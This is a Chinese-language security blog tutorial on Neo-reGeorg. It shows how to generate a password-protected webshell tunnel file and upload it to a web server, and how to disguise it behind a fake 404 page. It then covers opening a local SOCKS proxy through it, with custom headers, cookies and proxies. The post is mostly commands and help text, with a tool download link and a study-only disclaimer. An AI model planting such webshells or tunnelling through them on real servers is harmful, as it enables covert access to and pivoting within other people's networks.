Neo-reGeorg的使用方法说明

###基本用法

  • 第一步.
    设置密码生成 tunnel.(aspx|ashx|jsp|php) 并上传到WEB服务器
    $ python neoreg.py generate -k password

首先在python中安装各种库(运行命令时提示缺少哪些库就安装什么库)
在cmd中输入

python -m pip install requires
python -m pip install chardet
python -m pip install certifi
python -m pip install idna
python -m pip install pysocks
python -m pip install requests

出现下图则表示运行成功

蓝域安全网

然后再看原文件夹,发现会多出一个文件夹

蓝域安全网

这个文件夹中就是我们刚刚生成的tunnel隧道文件,以及设置的密码

蓝域安全网

上传相应的文件到服务器

蓝域安全网

  • 第二步

使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理

$ python3 neoreg.py -k password -u http://xx/tunnel.php

高级用法

1.支持生成服务端,默认 GET 请求响应指定的页面内容 (如伪装的404页面)

命令:$ python neoreg.py generate -k <you_password> --file 404.html

若原来执行过命令、创建有neoreg_server文件夹的,将其文件夹删除。然后在目录下构造一个404.html文件如:

蓝域安全网

在cmd中执行命令 python neoreg.py generate -k <you_password> --file 404.html

蓝域安全网

依旧会生成tunnel文件到neoreg_server文件夹

蓝域安全网

将tunnel.php上传到服务器,访问可见我们构造的页面

蓝域安全网

命令:python neoreg.py -k <you_password> -u <server_url>

2.如服务端WEB,需要设置代理才能访问

python neoreg.py -k <you_password> -u <server_url> --proxy socks5://10.1.1.1:8080

蓝域安全网

3.如需Authorization认证,或者定制的Header或Cookie

pytohn neoreg.py -k <you_password> -u <server_url> -H "Authorization: cm9vdDppcyB0d2VsdmU=" --cookie "key=value"

生成服务端脚本

$ python neoreg.py generate -h

使用: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [--read-buff Bytes]

Generate neoreg webshell     //生成Neoreg Webshell

可选参数:
  -h, --help             显示此帮助信息并退出
  -k KEY, --key KEY       特定连接密钥
  -o DIR, --outdir DIR     输出目录
  -f FILE, --file FILE      伪装html页面文件 (在上面演示过)
  --read-buff Bytes      远程读取缓存区 (默认值: 513)

如-o e:\tunnel 输出tunnel文件脚本到指定的文件夹下

蓝域安全网

蓝域安全网

连接服务端

$ python neoreg.py -h
使用: neoreg.py [-h] -u URI -k KEY [-l IP] [-p PORT] [-s] [-H LINE] [-c LINE]
[-x LINE] [--read-buff Bytes] [--read-interval MS]
[--max-threads N] [-v]

Socks server for Neoreg HTTP(s) tunneller      //Neoreg HTTP(S)隧道的SOCKS服务器

可选参数:
  -h, --help                显示此帮助信息并退出
  -u URI, --url URI           包含隧道脚本的url
  -k KEY, --key KEY           特定连接密钥
  -l IP, --listen-on IP          默认监听地址 (默认值: 127.0.0.1)
  -p PORT, --listen-port PORT  默认监听端口 (默认值: 1080)
  -s, --skip                 跳过可用性测试
  -H LINE, --header LINE      将自定义标题行传递到服务器
  -c LINE, --cookie LINE       自定义到服务器的cookie
  -x LINE, --proxy LINE        proto://host[:port] 在给定端口上使用代理
  --read-buff Bytes          本地读取缓冲区,每个日志发送的最大数据(默认值: 1024)
  --read-interval MS         读取数据间隔(毫秒) (默认值: 100)
  --max-threads N           代理最大线程数 (默认值: 1000)
  -v                      显示详细信息 (使用-vv或者更多的v显示更详细的信息)       

工具下载地址http://www.yemogege.cn/wzaq-stgz/402.html
以上就是蓝域安全网为您分享的-Neo-reGeorg的使用方法说明,如果你喜欢该篇文章 记得转发+关注!

本文链接:http://www.yemogege.cn/wzaq-stgz/401.html

更多相关文章阅读:

版权保护: 本文由admin所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stgz/401.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图